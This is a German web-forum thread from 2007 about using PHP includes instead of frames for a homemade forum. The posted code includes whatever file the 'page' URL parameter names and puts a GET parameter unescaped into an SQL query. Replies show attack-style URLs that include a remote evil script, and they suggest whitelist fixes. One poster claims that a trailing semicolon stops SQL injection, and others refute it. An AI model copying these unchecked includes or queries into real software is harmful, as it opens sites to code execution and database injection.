includes statt Frames - Hilfe!

KageMurai · 20. August 2007, 09:27

Hallo,

ich baue gerade eine Homepage MIT Forum zusammen. Jetzt habe ich die Datei index.php, welche nachher immer aufgerufen werden soll:

Quellcode

<?php
include ("navi.php");
if (isset($_GET['page'])) {
$page=$_GET['page'] . ".php";
include ($page);
}
?>

Alles anzeigen

Keine Angst, dass ist nur ein Test, der Code wird nachher noch sicher gemacht. Mein Board verweist immer auf neue Dateien, will heißen es ruft immer mit GET die Dateien board.php subboard.php und post.php auf. Ich will, dass diese immer unterhalb der navi erscheinen, die ich in index.php ja ganz oben incude. Wie kann cih das machen?

KageMurai

Torben Brodt · 20. August 2007, 12:10

KageMurai schrieb:

... will heißen es ruft immer mit GET die Dateien board.php subboard.php und post.php auf.

Ich wil nur sicher gehen, dass du das falsch formuliert hast. Der HTTP GET Request heißt nicht post.php sondern index.php?page=post, oder?
Desweiteren hast du das Board selber programmiert, oder?

Dann versteh ich eigentlich gar nicht wo das Problem ist

Oben wird der Navi angezeigt. Unten der Foreninhalt....

KageMurai · 20. August 2007, 12:16

Hallo,

habe ich mich glaube ich nicht richtig ausgedrückt

Sorry.

Hier ein bisschen Code:

index.php habt ihr ja gesehen. Navi.php soll dann die anderen Seiten aufrufen:

Quellcode

<div>
<a href="index.php?page=home">Home</a>
<a href="index.php?page=board">Board</a>
</div>

hier board.php:

Quellcode

<?php
include("configs.php");
$connection=mysql_connect($server,$user,$pass) or die (mysql_error());
mysql_select_db("nedias",$connection) or die (mysql_error());
$sql="SELECT * FROM boards";
$ergebnis=mysql_query($sql,$connection) or die (mysql_error());
print "<?xml version=\"1.0\" ?>";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>nedias free webspace</title>
<link rel="stylesheet" href="css/basic.css" type="text/css">
<link rel="stylesheet" href="css/board.css" type="text/css">
</head>
<body>
<?php
echo "<table class='board'>";
echo "<tr><td class='board'>Board</td>";
echo "<td class='threads'>Threads</td>";
echo "<td class='answer'>Antworten</td></tr>";
while($row=mysql_fetch_assoc($ergebnis)) {
$id=$row['board'];
echo "<tr><td class='board'><a href=\"subboard.php?id=$id\">" . $row['board'] . "</a></td>";
echo "<td class='threads'>" . $row['threads'] . "</td>";
echo "<td class='answer'>" . $row['posts'] . "</td></tr>";
}
echo "</table>";
?>

Alles anzeigen

Und abschließend noch subboard.php:

Quellcode

<?php
include("configs.php");
$currentboard=$_GET['id'];
$connection=mysql_connect($server,$user,$pass) or die (mysql_error());
mysql_select_db("nedias",$connection) or die (mysql_error());
$sql="SELECT * FROM threads WHERE in_board='$currentboard'";
$ergebnis=mysql_query($sql,$connection) or die (mysql_error());
print "<?xml version=\"1.0\" ?>";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>nedias free webspace</title>
<link rel="stylesheet" href="css/basic.css" type="text/css">
<link rel="stylesheet" href="css/board.css" type="text/css">
</head>
<body>
<table class="all"><tr><td class="thread">Thread</td><td class="answers">Antworten</td><td class="hits">Hits</td><td class="last_change">Last Change</td></tr>
<?php
while ($row=mysql_fetch_assoc($ergebnis)) {
$id=$row['name'];
echo "<tr><td class=\"thread2\"><a href=\"post.php?id=$id\">" . $row['name'] ."</td>";
echo "<td class=\"answers2\">" . $row['answers'] . "</td>";
echo "<td class=\"hits2\">" . $row['hits'] . "</td>";
echo "<td class=\"last_change2\">" . $row['last_change'] . "</td></tr>";
}
echo "</table><br/>";
echo "<table class=\"post_bottom\"><tr><td class=\"post_bottom_left\">";
if(session_is_registered('username') || $_SESSION['username'] != "") {
echo "<a href=\"newthread.php?id=$currentboard\">Neuen Thread eröffnen</a>"; } else {
echo "Sie müssen sich einloggen, um Themen zu eröffnen!"; }
echo "</td><td class=\"post_bottom_right\">";
echo "<a href=\"javascript:history.back()\">zurück</a>";
echo "</td></tr></table>";
echo "</body></html>";
mysql_free_result($ergebnis);
mysql_close($connection);
?>

Alles anzeigen

Das Problem ist, dass wenn ich unten board.php aufgeführt habe der nicht weiß, dass der in einem "Frameset vorkommt" und deswegen sozusagen die neuen Seiten ohne navi.php oben lädt. Das ist das Problem!

KageMurai

Torben Brodt · 20. August 2007, 14:27

naja, dann musst du die Links von subboard.php?id=$id in index.php?page=subboard&id=$id ändern.

KageMurai · 20. August 2007, 14:42

Hmm - wusste gar nicht, dass das geht. Habe es jetzt versucht und mal folgendermaßen abgeändert:

index.php:

Quellcode

<?php
include ("navi.php");
if (isset($_GET['page'])) {
$page=$_GET['page'];
include ($page);
}
?>

Alles anzeigen

board.php(auszug):

Quellcode

echo "<tr><td class='board'><a href=\"index.php?page=subboard.php?id=$id\">" . $row['board'] . "</a></td>";

navi.php:

Quellcode

<div>
<a href="index.php?page=home.php">Home</a>
<a href="index.php?page=board.php">Board</a>
</div>

Funktioniert aber nicht:

Quellcode

Home Board
Warning: include(subboard.php?id=nedias) [function.include]: failed to open stream: Invalid argument in C:\xampp\htdocs\test\index.php on line 8
Warning: include() [function.include]: Failed opening 'subboard.php?id=nedias' for inclusion (include_path='.;C:\xampp\php\pear\') in C:\xampp\htdocs\test\index.php on line 8

Habe ich da irgendwas falsch verstanden???

KageMurai

Torben Brodt · 20. August 2007, 14:55

KageMurai schrieb:

Habe ich da irgendwas falsch verstanden???

zumindest hast du falsch abgeschrieben... schau nochmal mein Posting an. Und lass auch die Index, wie sie war.

KageMurai · 20. August 2007, 15:07

Was ein zusätzliches .php alles bewirken kann...

Danke - jetzt funktioniet es.

KageMurai

Torben Brodt · 20. August 2007, 15:33

KageMurai schrieb:

Was ein zusätzliches .php alles bewirken kann...

das 2te Fragezeichen war schuld: index.php?page=x?var=x

Baby Herman · 20. August 2007, 16:17

KageMurai schrieb:

Quellcode

<?php

include ("navi.php");

if (isset($_GET['page'])) {

$page=$_GET['page'];

include ($page);

}

?>

Alles anzeigen

Ich hoffe nicht, dass du den Code wirklich so vereinfacht verwendest. Falls doch, ist das eine riesige Sicherheitslücke, die du dringend schließen solltest. Theoretisch könnte jeder Mensch aus dem Internet durch index.php?page=test.php etc. jede x beliebige URL aufrufen. Selbst index.php?page=http://www.google.de wäre möglich. Folglich empfehle ich dir dringend, die Variable $_GET auf richtigen Inhalt zu überprüfen und dann eventuell das php auch erst im nachhinein dazu zu schreiben. Das sieht dann auch noch schöner aus.

SeBa · 20. August 2007, 16:29

Das ist mir auch aufgefallen, da er aber geschrieben hat, dass das nur ein Test ist und er den Code noch sicher macht hab ich mir ein Kommentar verkniffen. Um auf die Gefahr einzugehen: Dadurch dass du alles includest was in der URL steht, kann ich eine Textdatei auf meinem Webserver packen in der beliebiger PHP Code steht und bei dir an die URL hinten dranhängen, der dann auf deinem Server inkludiert und ausgeführt wird (z.B. echo $_GLOBALS). Ich bekomm also sehr großzügige Rechte auf deiner Maschine mit denen viel Unsinn machen kann.

Max123 · 21. August 2007, 12:09

Genau das war mir auch aufgefallen...

Eine recht einfache Lösung dafür wäre:

Quellcode

switch ($_GET['page']) {
case 'page1': include('page1.php'); break;
case 'page2': include('page2.php'); break;
default: include('home.php');

Somit kann man durch index.php?page=http://www.expample.com/evilscript.php nicht mehr eigene Scripte einbinden.

Ich hoffe mal, dass nicht noch mehr Sicherheitslücken in deinem Board zu finden sind, aber wenn du schon einen solchen Fehler machst, befürchte ich das Schlimmste...

Auch solltest du deine MYSQL Statements am Ende schließen.

Quellcode

# aus diesem hier
SELECT * FROM boards
# mache lieber
SELECT * FROM boards;
# ausnutzen kann man dieses, wenn du z.b. dies hast
SELECT * FROM posts WHERE threatid = $id
# indem man einfach dieses übergibt: threat.php?id=5 JOIN evilstatement
#Folge:
SELECT * FROM posts WHERE threatid = 5 JOIN evilstatement

Baby Herman · 21. August 2007, 12:59

Und noch einfacher - meiner Meinung nach:

Quellcode

$cases = array('page1','page2'); // usw.
if(in_array($_GET['page'],$cases)) $page = $_GET['page'].'.php';
else $page = 'home.php';
include($page);

70abc · 21. August 2007, 14:33

Hallo Max123,

mal abgesehen davon, das KageMurai geschrieben hat, das er den Code zum Einbinden der Seiten so nicht einsetzten will (siehe aller erstes Posting), möchte ich kurz auf Deinen SQL-Tipp zu sprechen kommen:

Max123 schrieb:

Auch solltest du deine MYSQL Statements am Ende schließen.

Quellcode

# aus diesem hier

SELECT * FROM boards

# mache lieber

SELECT * FROM boards;

# ausnutzen kann man dieses, wenn du z.b. dies hast

SELECT * FROM posts WHERE threatid = $id

# indem man einfach dieses übergibt: threat.php?id=5 JOIN evilstatement

#Folge:

SELECT * FROM posts WHERE threatid = 5 JOIN evilstatement

Wichtig ist, das übergebene Variablen entsprechend behandelt werden, um keine zusätzlichen SQL-Code einschleusen zu können.
In Deinem Beispiel würde z.B. ein einfaches intval($id) genügen.

Aber Erklär doch mal bitte, was das Semikolon an zusätzlicher Sicherheit bringen soll? Ich kann mir momentan kein SQL Statement vorstellen, wo es irgend was helfen würde. Auch in Deinem Beispiel bleibt mir der Nutzen, oder besser gesagt die zusätzliche Sicherheit, die das Semikolon darstellen soll verborgen. Aber man lernt ja nie aus...

70abc

Max123 · 23. August 2007, 11:28

Unter de.wikipedia.org/wiki/SQL-Injektion#Vorgang findest du einige sehr interessante Beispiele.
Aber das hatten wir schonmal in einem anderen Thread und d0nut hatte dort glaube ich eine gute Lösungsmöglichkeit für PHP5 gepostet.

SeBa · 23. August 2007, 11:38

In den Wikipediabeispielen wird kein Semikolon gesetzt vom Webseitenprogrammierer, aber jedesmal vom Hacker in sein Statement eingebunden. Wenn du deine SQL-Statements nun selber mit einem Semikolon abschließt kann der Hacker genauso vorgehen wie voher, nur dass er sein Statement nicht mehr mit einem Semikolon schließen muss, sondern das vom Webserver übernimmt. Selbst wenn er sein Statement mit einem Semikolon abschließt und das was da schon steht nicht auskommentiert, erzeugt er zwar einen SQL Fehler (falls lere Statements überhaupt verboten sind), aber seine Abfrage würde noch ausgeführt werden. Also egal wie ers macht, ich sehe darin nun wirklich keinen Unterschied.

70abc · 23. August 2007, 17:12

Max123 schrieb:

Unter de.wikipedia.org/wiki/SQL-Injektion#Vorgang findest du einige sehr interessante Beispiele.
Aber das hatten wir schonmal in einem anderen Thread und d0nut hatte dort glaube ich eine gute Lösungsmöglichkeit für PHP5 gepostet.

Hallo Max123,

danke für den Link, aber wie auch schon SeBa geschrieben hat, bringt das abschliessen der SQL-Statemnts mit einem Semikolon nichts, die Beispiele würden auch alle funktionieren, wenn man die SQL-Statements mit einem Semikolon abschliessen würde.

Das Semikolon dient ja lediglich dazu, mehrere SQL-Statements semantisch zu trennen. Eine SQL-Injection abwehren kann es nicht.

70abc

Max123 · 26. August 2007, 10:22

Man lernt ja nie aus.
Ne, bingt wirklich nichts. Hab eure Argumentation verstanden.
Danke!

includes statt Frames - Hilfe!

includes statt Frames - Hilfe!

Quellcode

KageMurai schrieb:

Quellcode

Quellcode

Quellcode

Quellcode

Quellcode

Quellcode

Quellcode

KageMurai schrieb:

KageMurai schrieb:

KageMurai schrieb:

Quellcode

Quellcode

Quellcode

Quellcode

Max123 schrieb:

Quellcode

Max123 schrieb:

Teilen

Benutzer online 1

Tags